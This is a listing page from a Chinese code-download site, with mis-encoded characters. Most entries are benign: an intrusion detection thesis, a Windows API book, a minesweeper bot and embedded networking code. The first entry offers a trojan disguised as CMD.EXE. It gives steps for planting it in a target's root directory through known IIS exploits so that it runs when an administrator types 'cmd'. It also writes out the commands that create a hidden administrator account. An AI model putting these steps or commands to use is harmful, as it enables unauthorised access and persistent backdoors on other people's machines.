你是不是經(jīng)常在開始菜單的運行窗口里運行命令呢? 看看這個漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在執(zhí)行搜索的時候, 首先查找根目錄 而開始菜單的運行窗口里執(zhí)行命令, 也是首先在系統(tǒng)盤的根目錄里進(jìn)行查找. 這個漏洞其實是已經(jīng)是公開的秘密了. 既然現(xiàn)在作為漏洞公布出來, 我也就把網(wǎng)上的PasswordReminder.cpp拿來改了改 加了一個加超級管理員用戶和執(zhí)行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標(biāo)機(jī)器的系統(tǒng)盤根目錄, 一般都是在C:比如利用UNICODE/Decode漏洞就有寫根目錄的權(quán)限, 同時Asp/fp30reg.dll等遠(yuǎn)程溢出出來的Shell, 一般都只有匿名權(quán)限, 但是它具有寫根目錄的權(quán)限 這個時候, 就可以把本程序放到目標(biāo)機(jī)器的系統(tǒng)盤根目錄 只要等管理員在機(jī)器的開始菜單里運行命令: cmd 一切盡在掌握中.:) PS: 系統(tǒng)執(zhí)行后, 會先產(chǎn)生一個線程來做一些處理 然后用system()函數(shù)調(diào)用cmd.exe來讓用戶能夠執(zhí)行命令. 產(chǎn)生出來的線程會產(chǎn)生兩個進(jìn)程序執(zhí)行如下兩個命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統(tǒng)上增加了一個超級
標(biāo)簽: 964057 zdnet http 2100
上傳時間: 2015-01-12
上傳用戶:qlpqlq
一個匯編與VC結(jié)合的程序代碼 本程序旨在展示一下怎樣在VC中嵌入?yún)R編語言,來減少程序的大小。
上傳時間: 2013-12-09
上傳用戶:wangchong
基于TCP/IP協(xié)議的網(wǎng)絡(luò)入侵檢測系統(tǒng)是在Linux平臺下,充分利用Linux的網(wǎng)絡(luò)特性來設(shè)計的網(wǎng)絡(luò)安全防御系統(tǒng)的一部分。在完全理解TCP/IP通訊協(xié)議的基礎(chǔ)上來開發(fā)基于網(wǎng)絡(luò)的入侵檢測系統(tǒng),它主要包括以下幾個部分:數(shù)據(jù)包攔截器,數(shù)據(jù)包分析器,數(shù)據(jù)包生成器,遠(yuǎn)程通訊控制模塊,集中管理模塊等。 關(guān)鍵字:入侵檢測系統(tǒng),網(wǎng)絡(luò)安全,協(xié)議分析,網(wǎng)絡(luò)入侵檢測系統(tǒng)
標(biāo)簽: Linux TCP IP 協(xié)議
上傳時間: 2015-01-12
上傳用戶:xuanchangri
簡單的講解語言,非常實用,使你在短期內(nèi)就能熟練掌握其變成技巧
標(biāo)簽: 語言
上傳時間: 2014-01-02
上傳用戶:CHENKAI
本書介紹了在Microsoft Windows 98、Microsoft Windows NT 4.0和Windows NT 5.0下程序?qū)懽鞯姆椒ā_@些程序用C語言編寫并使用原始的Windows Application Programming Interface(API)。如在本章稍后所討論的,這不是寫作Windows程序的唯一方法。然而,無論最終您使用什么方式寫作程序,了解Windows API都是非常重要的。
標(biāo)簽: Windows Microsoft NT 4.0
上傳時間: 2014-11-29
上傳用戶:haohaoxuexi
自動掃雷機(jī) v1.0 1.雙語版(中文,英文),能自動檢測操作系統(tǒng)版本和語言,采用相應(yīng)的界面和掃雷規(guī)則 2.可以自動完成掃雷過程, 在Athlon 1G上的最好成績?yōu)? 初級:1秒 中級:1秒 高級:2秒 3.可以控制掃雷窗口的時鐘的快慢,甚至停止 缺點:人工智能推理部分做得不是很理想,希望大家能幫忙改善.
標(biāo)簽: Athlon 1.0 自動 操作系統(tǒng)
上傳時間: 2013-12-18
上傳用戶:gxmm
在嵌入式系統(tǒng)DeltaSYSTEM中實現(xiàn)PING主機(jī),TCP服務(wù)器,TCP客戶端,UDP服務(wù)器,UDP客戶端的程序
標(biāo)簽: DeltaSYSTEM PING 嵌入式系統(tǒng) 主機(jī)
上傳時間: 2015-01-12
上傳用戶:獨孤求源
你在做網(wǎng)頁嘛,如果是的話,這是你不可多得的超Cool工具。這是可以自動生成網(wǎng)頁特效的軟件,每個特效都可以有您進(jìn)行參數(shù)設(shè)置,100%傻瓜性。收集了包括時間特效,文字特效,圖像處理,鼠標(biāo)特效,頁面特效,菜單特效,在線游戲,其它特效在內(nèi)的八類上百個精彩特效。這些特效都是使用率比較高的JavaScript代碼,您可以直接使用。軟件內(nèi)置瀏覽器,您可以隨時預(yù)覽特效效果;特效制作好之后,您可以把它復(fù)制到剪貼板,或者保存到文件中;軟件的界面美觀新穎,操作簡單明了,極易上手。輕輕點幾下鼠標(biāo),又炫又酷的網(wǎng)頁任你選!
上傳時間: 2013-12-12
上傳用戶:縹緲
無線產(chǎn)品在嵌入式中的應(yīng)用(PDF)
標(biāo)簽: 無線產(chǎn)品 嵌入式 中的應(yīng)用
上傳時間: 2014-01-01
上傳用戶:netwolf
機(jī)器人的實時控制。VxWork,Windows系統(tǒng)在機(jī)器人控制方面的應(yīng)用。鏈接來自 http://www.automationit.hut.fi
標(biāo)簽: automationit Windows VxWork http
上傳時間: 2015-01-12
上傳用戶:Miyuki
蟲蟲下載站版權(quán)所有 京ICP備2021023401號-1